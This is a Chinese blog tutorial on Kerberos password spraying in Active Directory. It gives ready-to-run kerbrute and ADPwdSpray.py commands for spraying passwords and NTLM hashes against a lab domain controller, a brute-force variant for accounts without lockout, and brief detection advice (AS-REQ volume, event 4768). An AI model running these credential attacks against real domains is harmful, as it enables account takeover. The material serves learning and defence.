首页 > 其他分享 >域内密码喷洒

域内密码喷洒

时间:2023-08-10 23:56:28浏览次数:29  
标签:55.4 xie 密码 喷洒 txt com

原理:请求包Cname对应的额值是用户名。用户名存在密码正确和密码错误两种情况的asrep返回包不一样。

密码喷洒和普通的爆破的区别在于 普通爆破利用固定的用户名爆破密码。密码喷洒用于 同一个密码爆破不同用户不触发账号锁定策略

工具使用

kerbrute 密码喷洒命令

kerbrute_windows_amd64.exe passwordspray --dc 10.211.55.4 -d xie.com user.txt p@ss1234

tips:如果探测到没有账户锁定策略 可以使用单向密码爆破

kerbrute_windows_amd64.exe bruteuser --dc 10.211.55.4 -d xie.com pass.txt administrator

pykerbrute密码喷洒

针对密码进行喷洒

python2 ADPwdSpray.py 10.211.55.4 xie.com user.txt clearpassword p@ss1234 tcp 

python2 ADPwdSpray.py 10.211.55.4 xie.com user.txt clearpassword p@ss1234 udp

针对ntlm hash等进行喷洒

python2 ADPwdSpray.py 10.211.55.4 xie.com user.txt ntlmhash hash tcp 

python2 ADPwdSpray.py 10.211.55.4 xie.com user.txt ntlmhash hash udp

防御:

1.流量层面 通过同一ip在短时间诶是否发送了大量的as-req包来判断。

2.日志层面:口令爆破成功是,会产生事件ID为4768的结果代码为0x0的审核成功kerberos身份验证服务时间日志。但默认是不记录该日志的需要开启审核和高级审核策略

标签:55.4,xie,密码,喷洒,txt,com
From: https://www.cnblogs.com/lisenMiller/p/17621915.html

相关文章

  • 河南移动H2-3v获取超级密码修改桥接教程
    普通账号登录光猫后台(光猫背面密码) 登录成功后,在网络里面查看当前连接的VLANID值并记录下来,然后直接在浏览器输入:http://192.168.1.1/getpage.gch?pid=1002&nextpage=tele_sec_tserver_t.gch 点击启用Telnet并确定保存 右键密码框点击审查元素 把元素的type="passwo......
  • MySQL主从复制修改复制用户及密码【转】
    在生产环境中有时候需要修改复制用户账户的密码,比如密码遗失,或者由于多个不同的复制用户想统一为单独一个复制账户。对于这些操作应尽可能慎重以避免操作不同导致主从不一致而需要进行修复。本文描述了修改复制账户密码以及变更复制账户。1、更改复制账户密码--演示环境,同一......
  • pikachu与DVWA暴力破解账号密码
    pikachu和DVWA暴力破解账号密码pikachu靶场1. 打开小皮,激活pikachu本地靶场,再打开burpsuite,最后打开firefox浏览器,激活burpsuite代理2. 随便输入一个账号和密码,例如账号输入admin,密码输入1234563. 此时burpsuite已提示抓取成功,右键空白处,选择sendtointruder4.......
  • 禁用账号密码使用ssh私钥登录服务器
    1、生成ssh信息id_rsa为私钥,id_rsa.pub为公钥。私钥自己下载到本地电脑妥善保存(丢失后就无法再登陆了)建议删除服务器端的私钥。公钥则可以任意公开。ssh-keygen-trsa--------------------------------------输入生成的名称密码确认密码2、公钥导入到系统中cat/roo......
  • 【解密】PDF文档忘记编辑密码 照样编辑
    本文目录方式一、打开网站,解除限制方式二、使用“PDF补丁丁”软件在文档编辑过程中,为了防止别人修改我们的文档,常常会给文档设置限制编辑的密码。不过有时也会“聪明反被聪明误”,时间一长,自己设置的密码可能就会忘掉,既不能编辑修改,也不能打印,看着干着急,有什么解决办法吗?如果你......
  • 外设移除区别/终端记录/重设密码/python测试/数据拷贝最大限度
    1.1【卸载】【弹出】【安全移除驱动器】区别【卸载】只是解除挂载(可以直接重新挂载)【弹出】弹出读卡器里面的存储卡(需要重新插入存储卡)【安全移除驱动器】断掉设备电源,移除设备(需要重新插入设备)1.2记录你的终端操作──script   (点击详细)如果过程不是很长,一屏以内的话一......
  • 银行电子密码器也远程管理吗?操作步骤如下
    企业需要在不同办公地点管理多个资金账户,能不能远程点按读取银行电子密码器呢?三个字,很简单!可以用密码点按器!有了它就可以自动输入密码和读取验证码!第一步用双面胶把密码器固定在点按器上,一台点按器最多可以管理六个密码器,第二步打开朝天椒软件,给点按器录入不同密码按键的位置坐标。......
  • MySQL重置密码
    要重置MySQL密码,您需要遵循以下步骤:停止MySQL服务:在您重置密码之前,您需要停止正在运行的MySQL服务。可以使用操作系统的服务管理工具(如Windows的服务管理器)来停止MySQL服务。启动MySQL以跳过权限检查:在启动MySQL时,您可以使用特殊的启动参数来跳过权限检查,从......
  • linxu查看用户密码和修改用户密码
    1、查看所有用户名和密码cat/etc/shadow2、修改密码sudopasswduser(user是对应的用户名)输入新密码,确认密码,修改密码成功,重启,输入新密码进入服务器。......
  • 如何通过navicat连接数据库修改EasyCVR视频监控管理平台的登录密码?
    TSINGSEE青犀视频监控管理平台EasyCVR可以根据不同的应用场景需求,让平台在内网、专网、VPN、广域网、互联网等各种环境下进行音视频的采集、接入与多端分发。在视频能力上,平台可实现视频实时直播、云端录像、云存储、回放与检索、告警上报、视频快照、视频转码与分发、平台级联等。......